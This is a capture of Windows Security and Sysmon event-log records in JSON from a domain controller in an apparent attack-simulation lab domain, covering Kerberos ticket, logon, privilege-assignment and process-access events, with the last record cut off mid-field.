{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220743,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220744,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220745,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x11D4BF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x11d4bf","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220746,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x11D4BF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x11d4bf","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8559,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.646\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D2-5F25-0000-0010F3D41100}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.646","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D2-5F25-0000-0010F3D41100}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8560,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.646\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22D2-5F25-0000-0010F3D41100}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.646","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22D2-5F25-0000-0010F3D41100}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8561,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.646\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.646","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8562,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.646\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.646","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8563,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D2-5F25-0000-0010F3D41100}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D2-5F25-0000-0010F3D41100}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8564,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 4504\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D2-5F25-0000-0010F3D41100}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: 